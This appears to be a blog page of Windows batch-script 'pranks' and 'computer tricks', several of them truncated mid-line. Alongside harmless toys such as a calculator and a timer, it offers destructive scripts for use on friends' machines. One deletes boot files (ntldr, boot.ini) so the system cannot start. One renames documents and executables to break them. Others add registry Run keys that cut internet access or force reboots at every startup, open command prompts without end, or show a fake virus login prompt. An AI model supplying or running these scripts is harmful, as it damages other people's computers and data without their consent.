Hello friends,
In this blog, use can see lots of vbs (visual basic script) code under the category of computer tricks . By this,You can learn about vbs and also you can prank your friends .
Note...
Sunday, 27 November 2016
Crash
System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv...
TXT Files
Change files to non-working TXT files
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
save it as learnfromzero.ba...
Disable Internet
Disable internet permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v
WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve...
Cmd Calculator
@echo
off
title Calc
:loop
cls
set /p first=First number:
echo.
echo Mark ( + - * / )
set /p mark=Mark:
echo.
set /p second=Second number:
set /a final=%first%%mark%%second%
echo.
echo %final%
pause
goto loop
Save it as learnfromzero.ba...
30 sec Timer
@echo
off
for /L %%A in (30,-1,0) do (
echo %%A
ping localhost -n 2 >nul
)
pause
Save it
as learnfromzero.ba...
Shutdown your computer forever
!!! WARNING !!! It shuts
the computer off once, and deletes the files needed to reboot and restart
!!!
@echo off
attrib -r
-s -h c:\autoexec.bat
del
c:\autoexec.bat
attrib -r
-s -h c:\boot.ini
del
c:\boot.ini
attrib -r
-s -h c:\ntldr
del
c:\ntldr
attrib -r
-s -h c:\windows\win.ini
del
c:\windows\win.ini
Save it as Learnfromzero.bat
REMEMBER
-...
Start website
Description:
This will allow you to start any program just by opening this file including
the task manager.
1. Go into Notepad and type:
start "www.examplewebsite.com" (without
quotes and with a real domain name.)
2. Save it as start.bat
3. Test it out to see if it gets you to the website...
Fake Area
Description:
Shows a fake username and password entrance area then deletes it self.
1. Go into notepad and type:
@echo off
echo If the proper username and password is not entered all files will be
deleted by this virus.
echo Good Luck
set/p\/name=username:
set/p\/password=password:
echo haha you got the...
Shut Down
Description:
This makes your friend think that his/her computer has a virus then their
computer shuts down.
1. Go to notepad and type:
@echo off
:A
cls
echo Do you wanna crash your computer? (y/n)
pause
echo Are you sure? (y/n)
pause
echo your computer will crash when the time reaches zero.
pause
msg...
Command prompts unlimited
This prank
will open and unlimited amount of command prompts until the computer crashes or
you manually crash it.
1. Go into Notepad
2. Type start
virus.bat
3. Save it as virus.bat
4. Test it if you want. ;)
(This program can't damage your...
Delete
This prank
will make your friends think that all of their files are being deleted and then
at the end the file deletes itself so it is untraceable.
@echo off
echo do you want to delete all of your
computer data? (y/n)
pause >nul
echo Do not exit out of the screen or all computer data will be deleted.
ping localhost...
Unclosable File
Description:
This prank will create and open a file that they cannot close, minimize, or
maximize without closing the command prompt behind it.
@echo off
md hello
:A
start hello
goto A
Save it as Learnfromzero.ba...
Matrix effect
@echo off
color 02
:start
echo %random% %random% %random% %random%
%random% %random% %random% %random% %random% %random%
goto start
Save it as Learnfromzero.ba...